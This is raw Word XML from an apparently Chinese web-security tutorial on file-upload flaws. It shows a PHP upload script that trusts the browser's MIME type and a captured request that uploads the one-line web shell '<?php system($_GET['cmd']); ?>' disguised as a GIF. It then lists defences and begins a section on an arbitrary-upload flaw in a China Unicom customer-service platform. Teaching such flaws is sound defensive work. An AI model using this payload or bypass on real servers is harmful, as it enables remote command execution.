        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9255" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:20.2pt;width:319.25pt;height:504.3pt;z-index:4576;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page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&lt;form action="up2.php" method="post"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enctype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="multipart/form-data"&gt;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&lt;label for="file"&gt;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Filename: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&lt;/label&gt;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&lt;input type="file" name="file" id="file" /&gt;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&lt;br /&gt;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&lt;input type="submit" name="submit" value="Submit" /&gt;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&lt;/form&gt;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((($_FILES["file"]["type"] == "image/gif")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|| ($_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"file"]["type"] == "image/jpeg")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|| ($_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"file"]["type"] =</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>= "image/pjpeg"))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&amp;&amp; ($_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"file"]["size"] &lt; 20000)) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="123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($_FILES["file"]["error"] &gt; 0) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360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"Return Code: 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"file"]["error"] . "&lt;br /&gt;";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="247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right="5613"/>
                    <w:jc w:val="center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else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{</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360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"Upload: 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"file"]["name"] . "&lt;br /&gt;";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360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"Type: 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"file"]["type"]</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> . "&lt;br /&gt;";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360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"Size: " . ($_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"file"]["size"] / 1024) .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" Kb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&lt;br /&gt;";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="361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"Temp file: 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"file"]["tmp_name"] . "&lt;br /&gt;";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="361" w:lineRule="exact"/>
                    <w:ind w:left="247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if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(file_exists("./"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"file"]["name"])) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="372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$_FILES["file"]["name"] . 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" already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exists. ";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="5568"/>
                    <w:jc w:val="center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before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="372" w:right="1173" w:hanging="125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else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{ </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve">move_uploaded_file($_FILES["file"]["tmp_name"], </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>"./"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"file"]["name"]);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342" w:lineRule="exact"/>
                    <w:ind w:left="372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"Stored in: " . "./" . $_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>FILES[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>"file"]["name"];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="361" w:lineRule="exact"/>
                    <w:ind w:right="5568"/>
                    <w:jc w:val="center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微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">MIME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia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254" type="#_x0000_t202" style="width:319.25pt;height:108.05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ind w:right="5817"/>
                    <w:jc w:val="center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ind w:left="123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else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{</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="123"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>echo</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> "Invalid file";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="123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9"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="361" w:lineRule="exact"/>
                    <w:ind w:right="6126"/>
                    <w:jc w:val="center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w w:val="95"/>
                      <w:sz w:val="21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spacing w:line="289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在这个脚本中，我们增加了对文件上传的限制。用户只能上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="1946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传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> .gif </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> .jpeg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件，需要浏览器提供该信息的支持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用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> BS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>抓包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如下：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6"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s9233" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:.2pt;width:319.25pt;height:360.25pt;z-index:-366352;mso-position-horizontal-relative:page" coordorigin="1797,4" coordsize="6385,7205">
            <v:rect id="_x0000_s9253" style="position:absolute;left:1797;top:4;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9252" style="position:absolute;left:1797;top:365;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9251" style="position:absolute;left:1797;top:725;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9250" style="position:absolute;left:1797;top:1085;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9249" style="position:absolute;left:1797;top:1445;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9248" style="position:absolute;left:1797;top:1806;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9247" style="position:absolute;left:1797;top:2166;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9246" style="position:absolute;left:1797;top:2526;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9245" style="position:absolute;left:1797;top:2886;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9244" style="position:absolute;left:1797;top:3246;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9243" style="position:absolute;left:1797;top:3607;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9242" style="position:absolute;left:1797;top:3967;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9241" style="position:absolute;left:1797;top:4327;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9240" style="position:absolute;left:1797;top:4687;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9239" style="position:absolute;left:1797;top:5048;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9238" style="position:absolute;left:1797;top:5408;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9237" style="position:absolute;left:1797;top:5768;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9236" style="position:absolute;left:1797;top:6128;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9235" style="position:absolute;left:1797;top:6488;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9234" style="position:absolute;left:1797;top:6849;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <w10:wrap anchorx="page"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>POST /up2.php HTTP/1.1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Host: 5.5.5.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="398"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (X11; Linux i686; rv</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>:2.0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) Gecko/2010010 1 Firefox/4.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,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*/*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>;q</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="3420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Accept-Language: en-us</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>,en</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>;q=0.5 Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="2030"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Accept-Charset: ISO-8859-1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>,utf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>-8;q=0.7,*;q=0.7 Keep-Alive: 115</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="2" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="3723"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxy-Connection: keep-alive Referer: </w:t>
      </w:r>
      <w:hyperlink r:id="rId55">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>http://5.5.5.2/up2.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>:multipart</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/form-data;     boundary=------------------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---------6537129554217994941264651983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Content-Length: 359</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360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-----------------------------6537129554217994941264651983</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="571"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Content-Disposition: form-data; name="file"; filename="1.gif" Content-Type: image/gif</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="343" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr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-----------------------------6537129554217994941264651983</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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微软雅黑"/>
          <w:sz w:val="5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</w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s9232" type="#_x0000_t202" style="width:319.25pt;height:54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line="319" w:lineRule="exact"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="50" w:name="中国联通客服平台任意文件上传"/>
                  <w:bookmarkStart w:id="51" w:name="_bookmark24"/>
                  <w:bookmarkEnd w:id="50"/>
                  <w:bookmarkEnd w:id="51"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>Content-Disposition: form-data; name="submit"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360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Submit</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="361" w:lineRule="exact"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>-----------------------------6537129554217994941264651983--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"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4051163" cy="2923222"/>
            <wp:effectExtent l="0" t="0" r="0" b="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163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"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="322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>防范方式：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1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用白名单方式检测文件后缀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2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上传之后按时间能算法生成文件名称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3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上传目录脚本文件不可执行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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">%00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>截断</w:t>
      </w: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rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="18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b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中国联通客服平台任意文件上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr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only_guest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24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9231" type="#_x0000_t202" style="width:319.25pt;height:554.2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80020F">
                  <w:pPr>
                    <w:spacing w:before="37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/**</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a4"/>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="320"/>
                    </w:tabs>
                    <w:spacing w:before="73" w:line="240" w:lineRule="auto"/>
                    <w:ind w:hanging="23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uploadFlash.php</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a4"/>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="320"/>
                    </w:tabs>
                    <w:spacing w:before="48" w:line="240" w:lineRule="auto"/>
                    <w:ind w:hanging="230"/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>Flash</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-66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文件上传</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>.</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="307" w:lineRule="auto"/>
                    <w:ind w:right="3770" w:firstLine="88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*/ require_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once(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'../global.inc.php');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6"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">//operateId=1 </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>上传</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>,operateId</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>=2</w:t>
                  </w:r>
                  <w:r>
